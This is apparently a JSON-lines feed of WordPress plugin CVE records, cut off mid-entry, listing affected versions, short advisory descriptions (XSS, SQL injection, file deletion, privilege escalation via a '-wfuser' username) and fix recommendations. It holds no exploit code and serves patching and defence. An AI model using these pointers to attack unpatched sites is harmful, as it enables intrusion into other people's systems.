{"CVE_ID":"CVE-2024-13748","slug":"ultimate-classified-listings","versionImpact":"1.4","versionEndExcluding":"1.5","description":"The Ultimate Classified Listings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Title parameter in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-classified-listings\\\/tags\\\/1.4\\\/inc\\\/helpers.php#L407\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-classified-listings\\\/tags\\\/1.4\\\/inc\\\/helpers.php#L407\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c925848-1ba7-4009-93c2-1648dbf808e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c925848-1ba7-4009-93c2-1648dbf808e9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11436","slug":"pie-forms-for-wp","versionImpact":"1.4.19","versionEndExcluding":"1.5","description":"The Drag & Drop Builder, Human Face Detector, Pre-built Templates, Spam Protection, User Email Notifications & more! plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.4.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202800\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202800\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/125a1d8d-8cd9-439c-b765-198ad369f987?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/125a1d8d-8cd9-439c-b765-198ad369f987?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5071","slug":"sitekit","versionImpact":"1.4","versionEndExcluding":"1.5","description":"The Sitekit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'sitekit_iframe' shortcode in versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970788\\\/sitekit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970788\\\/sitekit\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/011c8a06-298e-4a53-9ef8-552585426d79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/011c8a06-298e-4a53-9ef8-552585426d79?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sitekit\\\/trunk\\\/inc\\\/sitekit-shortcode-iframe.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sitekit\\\/trunk\\\/inc\\\/sitekit-shortcode-iframe.php#L3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7638","slug":"forminator","versionImpact":"1.45.0","versionEndExcluding":"1.45.1","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to time-based SQL Injection via the `order_by` parameter in all versions up to, and including, 1.45.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.45.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.45.0\\\/library\\\/model\\\/class-form-entry-model.php#L2561\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.45.0\\\/library\\\/model\\\/class-form-entry-model.php#L2561\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f5a1eb3-3fda-49de-aefb-2205c9ca3520?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f5a1eb3-3fda-49de-aefb-2205c9ca3520?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3112","slug":"quotes-and-tips","versionImpact":"1.44","versionEndExcluding":"1.45","description":"The Quotes and Tips by BestWebSoft WordPress plugin before 1.45 does not properly validate image files uploaded, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)","recommendation":"Update to version 1.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa6f01d6-aa3b-4452-9c5f-49bb227fea9d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa6f01d6-aa3b-4452-9c5f-49bb227fea9d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6464","slug":"forminator","versionImpact":"1.44.2","versionEndExcluding":"1.44.3","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.44.2 via deserialization of untrusted input in the 'entry_delete_upload_files' function. This makes it possible for unauthenticated attackers to inject a PHP Object through a PHAR file. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. Deserialization occurs when the form submission is deleted, whether by an Administrator or via auto-deletion determined by plugin settings.","recommendation":"Update to version 1.44.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/trunk\\\/library\\\/model\\\/class-form-entry-model.php#L1249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/trunk\\\/library\\\/model\\\/class-form-entry-model.php#L1249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/trunk\\\/library\\\/model\\\/class-form-entry-model.php#L1263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/trunk\\\/library\\\/model\\\/class-form-entry-model.php#L1263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fforminator&old=3319860&new_path=%2Fforminator&new=3319860&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fforminator&old=3319860&new_path=%2Fforminator&new=3319860&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6707aa4c-c652-42c0-bdb9-00be984e7271?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6707aa4c-c652-42c0-bdb9-00be984e7271?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6463","slug":"forminator","versionImpact":"1.44.2","versionEndExcluding":"1.44.3","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'entry_delete_upload_files' function in all versions up to, and including, 1.44.2. This makes it possible for unauthenticated attackers to include arbitrary file paths in a form submission. The file will be deleted when the form submission is deleted, whether by an Administrator or via auto-deletion determined by plugin settings. This can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 1.44.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/trunk\\\/library\\\/model\\\/class-form-entry-model.php#L1249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/trunk\\\/library\\\/model\\\/class-form-entry-model.php#L1249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319860\\\/forminator#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319860\\\/forminator#file3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc9b4cb-d36b-4693-a7b9-1dad123b6639?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc9b4cb-d36b-4693-a7b9-1dad123b6639?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4776","slug":"cc-child-pages","versionEndExcluding":"1.43","description":"The CC Child Pages WordPress plugin before 1.43 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5ea8f7f-7d5a-4b2e-a070-a9aef7cac58a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5ea8f7f-7d5a-4b2e-a070-a9aef7cac58a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3487","slug":"forminator","versionImpact":"1.42.0","versionEndExcluding":"1.42.1","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018limit\u2019 parameter in all versions up to, and including, 1.42.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.42.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.41.2\\\/assets\\\/js\\\/front\\\/front.loader.js#L320\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.41.2\\\/assets\\\/js\\\/front\\\/front.loader.js#L320\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.41.2\\\/assets\\\/js\\\/front\\\/front.multi.js#L1006\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.41.2\\\/assets\\\/js\\\/front\\\/front.multi.js#L1006\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274844\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274844\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5039d63b-377d-435a-be31-4ae81ea30dd3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5039d63b-377d-435a-be31-4ae81ea30dd3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3479","slug":"forminator","versionImpact":"1.42.0","versionEndExcluding":"1.42.1","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Order Replay in all versions up to, and including, 1.42.0 via the 'handle_stripe_single' function due to insufficient validation on a user controlled key. This makes it possible for unauthenticated attackers to reuse a single Stripe PaymentIntent for multiple transactions. Only the first transaction is processed via Stripe, but the plugin sends a successful email message for each transaction, which may trick an administrator into fulfilling each order.","recommendation":"Update to version 1.42.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.41.2\\\/library\\\/modules\\\/custom-forms\\\/front\\\/front-action.php#L964\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.41.2\\\/library\\\/modules\\\/custom-forms\\\/front\\\/front-action.php#L964\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274844\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274844\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c873c04e-516e-41ee-a295-b8c5235abc1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c873c04e-516e-41ee-a295-b8c5235abc1b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8853","slug":"webo-facto-connector","versionImpact":"1.40","versionEndExcluding":"1.41","description":"The Webo-facto plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.40 due to insufficient restriction on the 'doSsoAuthentification' function. This makes it possible for unauthenticated attackers to make themselves administrators by registering with a username that contains '-wfuser'.","recommendation":"Update to version 1.41, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1280ceb-9ce8-47fc-8fd3-6af80015dea9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1280ceb-9ce8-47fc-8fd3-6af80015dea9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webo-facto-connector\\\/tags\\\/1.40\\\/WeboFacto\\\/Sso.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webo-facto-connector\\\/tags\\\/1.40\\\/WeboFacto\\\/Sso.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153062\\\/webo-facto-connector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153062\\\/webo-facto-connector\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13455","slug":"igumbi-online-booking","versionImpact":"1.40","versionEndExcluding":"1.41","description":"The igumbi Online Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'igumbi_calendar' shortcode in all versions up to, and including, 1.40 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.41, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3243431%40igumbi-online-booking&new=3243431%40igumbi-online-booking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3243431%40igumbi-online-booking&new=3243431%40igumbi-online-booking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b21f9cfa-8113-42bc-a9dc-4d891bd9821b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b21f9cfa-8113-42bc-a9dc-4d891bd9821b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6635","slug":"block-options","versionImpact":"1.40.3","versionEndExcluding":"1.40.4","description":"The EditorsKit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation on the 'import_styles' function in versions up to, and including, 1.40.3. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.40.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4528f9a1-7027-4aa9-b006-bea84aa19c84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4528f9a1-7027-4aa9-b006-bea84aa19c84?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/block-options\\\/tags\\\/1.40.3\\\/includes\\\/addons\\\/styles-manager\\\/rest-api\\\/gutenberghub-styles-import-export-controller.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/block-options\\\/tags\\\/1.40.3\\\/includes\\\/addons\\\/styles-manager\\\/rest-api\\\/gutenberghub-styles-import-export-controller.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010794\\\/block-options\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010794\\\/block-options\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4718","slug":"page-builder-add","versionEndExcluding":"1.4.9.9","description":"The Landing Page Builder WordPress plugin before 1.4.9.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04d7cd44-9e18-42b9-9f79-cc9cd6980526\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04d7cd44-9e18-42b9-9f79-cc9cd6980526\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3546","slug":"wp-migration-duplicator","versionImpact":"1.4.8","versionEndExcluding":"1.4.9","description":"The WordPress Backup & Migration plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the wp_mgdp_populate_popup function in all versions up to, and including, 1.4.8. This makes it possible for authenticated attackers, with subscriber access or above, to invoke this function and access log files maintained by the plugin. Additionally, the file name is user-provided and not properly sanitized, which allows attackers to read arbitrary log files on the file system.","recommendation":"Update to version 1.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/339c4eba-fa34-4db6-be4b-bcf0ba98121a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/339c4eba-fa34-4db6-be4b-bcf0ba98121a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3073573%40wp-migration-duplicator%2Ftrunk&old=3049128%40wp-migration-duplicator%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3073573%40wp-migration-duplicator%2Ftrunk&old=3049128%40wp-migration-duplicator%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5167","slug":"cm-email-blacklist","versionImpact":"1.4.8","versionEndExcluding":"1.4.9","description":"The CM Email Registration Blacklist and Whitelist WordPress plugin before 1.4.9 does not have CSRF check when adding or deleting an item from the blacklist or whitelist, which could allow attackers to make a logged in admin add or delete settings from the blacklist or whitelist menu via a CSRF attack","recommendation":"Update to version 1.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/67bb5ab8-4493-4f5b-a989-41576675b61a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/67bb5ab8-4493-4f5b-a989-41576675b61a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37918","slug":"coneblog-widgets","versionImpact":"1.4.8","versionEndExcluding":"1.4.9","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WPCone.Com ConeBlog \u2013 WordPress Blog Widgets allows Stored XSS.This issue affects ConeBlog \u2013 WordPress Blog Widgets: from n\/a through 1.4.8.","recommendation":"Update to version 1.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/coneblog-widgets\\\/wordpress-coneblog-plugin-1-4-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/coneblog-widgets\\\/wordpress-coneblog-plugin-1-4-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4832","slug":"agile-store-locator","versionEndExcluding":"1.4.9","description":"The Store Locator WordPress plugin before 1.4.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/735a33e1-63fb-4f17-812c-3e68709b5c2c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/735a33e1-63fb-4f17-812c-3e68709b5c2c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5308","slug":"podcast-subscribe-buttons","versionImpact":"1.4.8","versionEndExcluding":"1.4.9","description":"The Podcast Subscribe Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'podcast_subscribe' shortcode in versions up to, and including, 1.4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/podcast-subscribe-buttons\\\/tags\\\/1.4.8\\\/template-parts\\\/inline-button.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/podcast-subscribe-buttons\\\/tags\\\/1.4.8\\\/template-parts\\\/inline-button.php#L30\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2973904\\\/podcast-subscribe-buttons#file529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2973904\\\/podcast-subscribe-buttons#file529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17dbfb82-e380-464a-bfaf-2d0f6bf07f25?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17dbfb82-e380-464a-bfaf-2d0f6bf07f25?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2108","slug":"xpro-elementor-addons","versionImpact":"1.4.7.1","versionEndExcluding":"1.4.8","description":"The 140+ Widgets | Xpro Addons For Elementor \u2013 FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Site Title\u2019 widget's 'title_tag' and 'html_tag' parameters in all versions up to, and including, 1.4.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/site-title\\\/layout\\\/frontend.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xpro-elementor-addons\\\/trunk\\\/widgets\\\/site-title\\\/layout\\\/frontend.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255986\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3255986\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/009b9b0d-6cbd-402e-bc81-24661ff16b9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/009b9b0d-6cbd-402e-bc81-24661ff16b9d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4747","slug":"post-category-image-with-grid-and-slider","versionEndExcluding":"1.4.8","description":"The Post Category Image With Grid and Slider WordPress plugin before 1.4.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/004f1872-1576-447f-8837-f29fa319cbdc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/004f1872-1576-447f-8837-f29fa319cbdc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6120","slug":"sparkle-demo-importer","versionImpact":"1.4.7","versionEndExcluding":"1.4.8","description":"The Sparkle Demo Importer plugin for WordPress is vulnerable to unauthorized database reset and demo data import due to a missing capability check on the multiple functions in all versions up to and including 1.4.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all posts, pages, and uploaded files, as well as download and install a limited set of demo plugins.","recommendation":"Update to version 1.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f411d17-5b0d-4a4a-afa8-7efebf6965f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f411d17-5b0d-4a4a-afa8-7efebf6965f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L446\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L446\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L469\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L469\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L497\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L497\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L519\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L519\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L595\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L595\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L570\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-demo-importer\\\/tags\\\/1.4.7\\\/sparkle-demo-importer.php#L570\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sparkle-d